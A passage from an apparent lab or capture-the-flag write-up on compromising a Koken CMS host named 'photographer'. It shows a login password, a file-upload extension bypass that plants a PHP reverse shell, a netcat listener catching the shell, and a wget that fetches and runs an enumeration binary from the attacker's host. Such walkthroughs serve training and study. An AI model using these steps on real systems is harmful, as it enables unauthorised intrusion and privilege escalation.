passwd: babygirl</code></pre></div><ol start="4"><li><p><em>Web Logon and Pentesting</em></p></li></ol><p>Is it valid?</p><p>Yep!</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!OyJI!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F339db90a-287a-47f6-b23b-895bc093ff31_1699x834.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!OyJI!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F339db90a-287a-47f6-b23b-895bc093ff31_1699x834.png 424w, https://substackcdn.com/image/fetch/$s_!OyJI!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F339db90a-287a-47f6-b23b-895bc093ff31_1699x834.png 848w, https://substackcdn.com/image/fetch/$s_!OyJI!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F339db90a-287a-47f6-b23b-895bc093ff31_1699x834.png 1272w, https://substackcdn.com/image/fetch/$s_!OyJI!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F339db90a-287a-47f6-b23b-895bc093ff31_1699x834.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!OyJI!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F339db90a-287a-47f6-b23b-895bc093ff31_1699x834.png" width="1456" height="715" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/339db90a-287a-47f6-b23b-895bc093ff31_1699x834.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:715,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:133720,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/189524877?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F339db90a-287a-47f6-b23b-895bc093ff31_1699x834.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!OyJI!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F339db90a-287a-47f6-b23b-895bc093ff31_1699x834.png 424w, https://substackcdn.com/image/fetch/$s_!OyJI!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F339db90a-287a-47f6-b23b-895bc093ff31_1699x834.png 848w, https://substackcdn.com/image/fetch/$s_!OyJI!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F339db90a-287a-47f6-b23b-895bc093ff31_1699x834.png 1272w, https://substackcdn.com/image/fetch/$s_!OyJI!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F339db90a-287a-47f6-b23b-895bc093ff31_1699x834.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Now we needed to Upload the malicious File in here:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Wv_2!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2a7b75ce-40dc-466a-ae74-2fa6eaa16a1b_1699x834.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Wv_2!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2a7b75ce-40dc-466a-ae74-2fa6eaa16a1b_1699x834.png 424w, https://substackcdn.com/image/fetch/$s_!Wv_2!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2a7b75ce-40dc-466a-ae74-2fa6eaa16a1b_1699x834.png 848w, https://substackcdn.com/image/fetch/$s_!Wv_2!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2a7b75ce-40dc-466a-ae74-2fa6eaa16a1b_1699x834.png 1272w, https://substackcdn.com/image/fetch/$s_!Wv_2!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2a7b75ce-40dc-466a-ae74-2fa6eaa16a1b_1699x834.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Wv_2!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2a7b75ce-40dc-466a-ae74-2fa6eaa16a1b_1699x834.png" width="1699" height="834" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/2a7b75ce-40dc-466a-ae74-2fa6eaa16a1b_1699x834.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:834,&quot;width&quot;:1699,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:107450,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/189524877?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F00429842-c0fd-4a6b-9fff-6d966136e484_1699x834.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Wv_2!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2a7b75ce-40dc-466a-ae74-2fa6eaa16a1b_1699x834.png 424w, https://substackcdn.com/image/fetch/$s_!Wv_2!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2a7b75ce-40dc-466a-ae74-2fa6eaa16a1b_1699x834.png 848w, https://substackcdn.com/image/fetch/$s_!Wv_2!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2a7b75ce-40dc-466a-ae74-2fa6eaa16a1b_1699x834.png 1272w, https://substackcdn.com/image/fetch/$s_!Wv_2!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2a7b75ce-40dc-466a-ae74-2fa6eaa16a1b_1699x834.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>For the reverse Shell I&#8217;m just going to use <a href="http://www.revshells.com">www.revshells.com</a> and choose the PHP file.</p><p>PS: A little bit technique here on the File Upload vulnerability, we need to add extra file type:</p><p>So example as rev.php file, change it to rev.php.png</p><p>We needed to intercept the request to then remove the image extension from the Content, releasing only .PHP in last.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!ymJH!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa87194ce-5946-41b6-a708-8e8a05a78072_1600x855.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!ymJH!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa87194ce-5946-41b6-a708-8e8a05a78072_1600x855.png 424w, https://substackcdn.com/image/fetch/$s_!ymJH!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa87194ce-5946-41b6-a708-8e8a05a78072_1600x855.png 848w, https://substackcdn.com/image/fetch/$s_!ymJH!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa87194ce-5946-41b6-a708-8e8a05a78072_1600x855.png 1272w, https://substackcdn.com/image/fetch/$s_!ymJH!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa87194ce-5946-41b6-a708-8e8a05a78072_1600x855.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ymJH!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa87194ce-5946-41b6-a708-8e8a05a78072_1600x855.png" width="1600" height="855" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/a87194ce-5946-41b6-a708-8e8a05a78072_1600x855.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:855,&quot;width&quot;:1600,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:233191,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/189524877?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F437ddb3b-1823-4f04-8e9e-b6b28eeac756_1600x855.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!ymJH!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa87194ce-5946-41b6-a708-8e8a05a78072_1600x855.png 424w, https://substackcdn.com/image/fetch/$s_!ymJH!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa87194ce-5946-41b6-a708-8e8a05a78072_1600x855.png 848w, https://substackcdn.com/image/fetch/$s_!ymJH!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa87194ce-5946-41b6-a708-8e8a05a78072_1600x855.png 1272w, https://substackcdn.com/image/fetch/$s_!ymJH!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa87194ce-5946-41b6-a708-8e8a05a78072_1600x855.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Remove the .PNG leaving only .PHP at last.</p><ol start="5"><li><p><em>Initial Access</em></p></li></ol><p>Let&#8217;s check our listener and . . .Profit!!</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo nc -lvnp 9001
listening on [any] 9001 ...
connect to [192.168.45.214] from (UNKNOWN) [192.168.221.76] 53780
SOCKET: Shell has connected! PID: 2776
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data
which python3
/usr/bin/python3</code></pre></div><p>I change my Session with Python for better TTY tho.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">www-data@photographer:/var/www/html/koken/storage/originals/c0/c8$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">www-data@photographer:/var/www/html/koken/storage/originals/c0/c8$ cd /home
cd /home
www-data@photographer:/home$ ls
ls
agi  daisa  lost+found</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">www-data@photographer:/home$ cd daisa
cd daisa
www-data@photographer:/home/daisa$ ls
ls
Desktop    Downloads  Pictures  Templates  examples.desktop  user.txt
Documents  Music      Public    Videos     local.txt</code></pre></div><p>Looking at the internal File structure, if our path-way to PrivEsc is via unique file this could take forever.</p><p>Let&#8217;s try BloodPengu.</p><ol start="6"><li><p><em>PrivEsc Enumeration with BloodPengu</em></p></li></ol><p>First we need a Collector, but for perfect binary I&#8217;m first going to just download SACSPengu for the Compiler suggestion then PyPengu and run it on /tmp directory:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">www-data@photographer:/tmp$ bash sacspengu.sh
bash sacspengu.sh

SACSPengu v1.0.0
-----------------------------------

Target: photographer
User: www-data (UID: 33)

System Fingerprint
-----------------------------------
Kernel: Linux 4.15.0-115-generic
Distribution: Ubuntu 16.04 (xenial)
Architecture: x86_64
CPU: AMD EPYC 7413 24-Core Processor (1 cores)
Memory: 1.9G
Virtualization: vmware

C Library Detection
-----------------------------------
[!] GLIBC 2.23 detected (OLD)

Compiler Analysis
-----------------------------------
[-] Go not installed on target

Architecture Mapping
-----------------------------------
GOARCH: amd64

Storage Analysis
-----------------------------------
[+] /tmp (950M free)
[+] /var/tmp (950M free)
[+] /dev/shm (997M free)


PyPengu Compilation Command
-----------------------------------

[-] Target lacks Go compiler

Cross-compile on your machine:

CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -a -ldflags '-extldflags "-static"' -o pypengu-static ./cmd/pypengu

Transfer Methods
. . .[SNIP]. . .</code></pre></div><p>Okay:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -a -ldflags '-extldflags "-static"' -o pypengu-static ./cmd/pypengu</code></pre></div><p>Now we have PyPengu for it:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">www-data@photographer:/tmp$ wget http://192.168.45.214/pypengu
wget http://192.168.45.214/pypengu
--2026-03-01 00:51:33--  http://192.168.45.214/pypengu
Connecting to 192.168.45.214:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3377146 (3.2M) [application/octet-stream]
Saving to: 'pypengu'

pypengu             100%[===================&gt;]   3.22M  3.73MB/s    in 0.9s    

2026-03-01 00:51:34 (3.73 MB/s) - 'pypengu' saved [3377146/3377146]

www-data@photographer:/tmp$ chmod +x pypengu
chmod +x pypengu
www-data@photographer:/tmp$ ./pypengu -v
./pypengu -v
PyPengu: Linux PrivEsc Data Collector
Version: 1.0.0
Collecting data...

[*] Collecting users...
    Found 45 users
[*] Collecting groups...
    Found 72 groups
[*] Collecting sudo configuration...
[sudo] password for www-data: 

[sudo] password for www-data: 

[sudo] password for www-data: 

    [-] Could not run sudo -l
    Found 0 sudo entries
[*] Scanning for SUID binaries...
    Found 24 SUID binaries
[*] Checking Docker access...
[*] Scanning services...
    Found 137 writable services
[*] Scanning cron jobs...
    Found 0 cron jobs
[*] Checking kernel version...
    Kernel: 4.15.0-115-generic
    Found 1 potential CVEs
[*] Building graph...

[+] Data collected successfully
[+] Output: pypengu-output.json
[+] Nodes: 278 | Edges: 172 | Paths to root: 0</code></pre></div><p>Let&#8217;s import this JSON File back to Our Kali and see any Path-ways.</p><p>I see we have 1 Path to root via Kernel CVE</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!H2XU!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdcb55f6f-8c39-40d4-b2d8-82223c206f0a_1731x827.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!H2XU!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdcb55f6f-8c39-40d4-b2d8-82223c206f0a_1731x827.png 424w, https://substackcdn.com/image/fetch/$s_!H2XU!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdcb55f6f-8c39-40d4-b2d8-82223c206f0a_1731x827.png 848w, https://substackcdn.com/image/fetch/$s_!H2XU!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdcb55f6f-8c39-40d4-b2d8-82223c206f0a_1731x827.png 1272w, https://substackcdn.com/image/fetch/$s_!H2XU!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdcb55f6f-8c39-40d4-b2d8-82223c206f0a_1731x827.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!H2XU!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdcb55f6f-8c39-40d4-b2d8-82223c206f0a_1731x827.png" width="1456" height="696" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/dcb55f6f-8c39-40d4-b2d8-82223c206f0a_1731x827.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:696,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:463530,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/189524877?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdcb55f6f-8c39-40d4-b2d8-82223c206f0a_1731x827.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!H2XU!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdcb55f6f-8c39-40d4-b2d8-82223c206f0a_1731x827.png 424w, https://substackcdn.com/image/fetch/$s_!H2XU!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdcb55f6f-8c39-40d4-b2d8-82223c206f0a_1731x827.png 848w, https://substackcdn.com/image/fetch/$s_!H2XU!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdcb55f6f-8c39-40d4-b2d8-82223c206f0a_1731x827.png 1272w, https://substackcdn.com/image/fetch/$s_!H2XU!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdcb55f6f-8c39-40d4-b2d8-82223c206f0a_1731x827.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!6_rI!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01b2eba3-ad6f-42bb-b70c-943cf2c34176_1731x827.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!6_rI!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01b2eba3-ad6f-42bb-b70c-943cf2c34176_1731x827.png 424w, https://substackcdn.com/image/fetch/$s_!6_rI!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01b2eba3-ad6f-42bb-b70c-943cf2c34176_1731x827.png 848w, https://substackcdn.com/image/fetch/$s_!6_rI!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01b2eba3-ad6f-42bb-b70c-943cf2c34176_1731x827.png 1272w, https://substackcdn.com/image/fetch/$s_!6_rI!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01b2eba3-ad6f-42bb-b70c-943cf2c34176_1731x827.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!6_rI!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01b2eba3-ad6f-42bb-b70c-943cf2c34176_1731x827.png" width="1731" height="827" 